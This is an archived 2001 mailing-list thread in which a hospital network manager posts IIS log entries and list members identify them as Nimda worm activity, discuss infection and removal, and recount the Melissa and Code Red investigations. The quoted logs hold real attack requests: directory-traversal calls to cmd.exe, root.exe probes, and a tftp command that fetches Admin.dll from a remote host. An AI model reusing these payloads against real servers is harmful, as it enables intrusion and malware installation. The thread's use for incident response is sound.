Mike,

Here is a good starting place:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutio

This link is for a Microsoft TechNet page describing security issues for web sites. They also have a "batten down the hatches" script for IIS but I cannot find the URL for that page.

Doug

> -----Original Message-----
> From: owner-crime@/var/spool/majordomo/lists/crime
> [mailto:owner-crime@/var/spool/majordomo/lists/crime]On Behalf Of J.Michael Cuciti
> Sent: Friday, September 21, 2001 2:33 PM
> To: dldean; Kuo Jimmy
> Cc: crime@private
> Subject: Re: [RE: [RE: Any leads?]]
>
> Yes, I am 206.98.124.52. The ADMIN.DLL file was deleted and the directories the event view is referencing do not exist on my system. I have followed all instructions for removal from various postings from CRIME. No file referenced in postings is on my system.
>
> Do any of you know how I might stop this attack?
>
> -Mike
>
> dldean@private (dldean) wrote:
> This is 206.98.124.52 receiving get requests for the admin.dll from 206.98.79.246 and directory requests for his machine from 206.252.224.50 & 208.238.181.162.
>
> Doug
>
> > -----Original Message-----
> > From: owner-crime@/var/spool/majordomo/lists/crime
> > [mailto:owner-crime@/var/spool/majordomo/lists/crime]On Behalf Of Kuo, Jimmy
> > Sent: Friday, September 21, 2001 2:06 PM
> > Cc: crime@private
> > Subject: RE: [RE: Any leads?]
> >
> > Oh, I didn't notice the followup questions you asked the first time.
> >
> > I don't know about the structure of your logs. But are you 206.98.124.52?
> >
> > Could someone who reads IIS logs say if this is him sending or receiving GETs?
> >
> > And this is definitely Nimda. I just don't know if you're the target or the culprit. If you haven't upgraded, I'm tempted to believe you're infected and attacking others. The TFTP command shows up only on or after infection. And ADMIN.DLL (Nimda is admin spelt backwards) is also something that shows up after infection. But then you say you don't have it...
> >
> > Jimmy
> >
> > > -----Original Message-----
> > > From: J.Michael Cuciti [SMTP:mcuciti@private]
> > > Sent: Friday, September 21, 2001 1:44 PM
> > > To: Kuo Jimmy; Crispin Cowan; Jimmy Sadri
> > > Cc: crime@private
> > > Subject: Re: [RE: Any leads?]
> > >
> > > All:
> > >
> > > I still have a script trying to run, but the location and folder doesn't exist. This is what I found in my log file:
> > >
> > > 206.98.79.246, -, 9/18/01, 7:29:26, W3SVC, WWW, 206.98.124.52, 150, 151, 304, 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20c:\Admin.dll,
> > >
> > > 206.98.79.246, -, 9/18/01, 7:29:27, W3SVC, WWW, 206.98.124.52, 180, 151, 304, 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20d:\Admin.dll,
> > >
> > > 206.252.224.50, -, 9/18/01, 7:29:33, W3SVC, WWW, 206.98.124.52, 10, 72, 273, 403, 5, GET, /scripts/root.exe, /c+dir,
> > >
> > > 206.252.224.50, -, 9/18/01, 7:29:38, W3SVC, WWW, 206.98.124.52, 80, 96, 1652, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> > >
> > > 208.238.181.162, -, 9/18/01, 7:29:46, W3SVC, WWW, 206.98.124.52, 10, 97, 243, 500, 123, GET, /scripts/..A../winnt/system32/cmd.exe, /c+dir,
> > >
> > > If anybody knows what this is, please 'spain it to me.
> > >
> > > I am running IIS 3.0, NT4.0 w/sp3 (haven't upgraded, I inherited this, not my fault :-) )
> > >
> > > In the event log I see this same type of message running every few minutes. The script is supposedly running from \winnt\iisadmin\Scripts\..%5c..\admin.dll. This does not exist.
> > >
> > > Thanks...
> > >
> > > Mike Cuciti
> > > Network Service and Support Manager
> > > Tuality Healthcare
> > > 681.1749
> > >
> > > "Kuo, Jimmy" <Jimmy_Kuo@private> wrote:
> > > >The Melissa author was caught because he posted the infectious document from his own AOL account to a news group, rather than releasing it through a hacked account. His guilt was confirmed when the serial number in the document matched the PC in the dumpster outside his bedroom :-)
> > >
> > > No. He used a hacked acct. But we identified the exact time of the use of the acct (newsgroup posting message ID) and the FBI traced the phone records.
> > >
> > > And the PC was destroyed and never located.
> > >
> > > Where did you get your version of the story?
> > >
> > > >But Code Red and its derivatives is not an Office document, and therefore has no serial numbers. That investigators appear to have no leads months after Code Red appeared tells me that it was likely released to the wild from a compromised machine, or perhaps simultaneously released from multiple compromised machines. If the author(s) were good, then those compromised machines were initially attacked from other compromised machines. Likely all of these initial release vector machines have long since been wiped and re-installed, and the links to the author(s) have been cut.
> > >
> > > We have some "first instances" of traffic. I don't know what the FBI's doing with the information gathered so far. But I agree that it's difficult and not likely.
> > >
> > > Jimmy
This archive was generated by hypermail 2b30 : Sun May 26 2002 - 11:25:48 PDT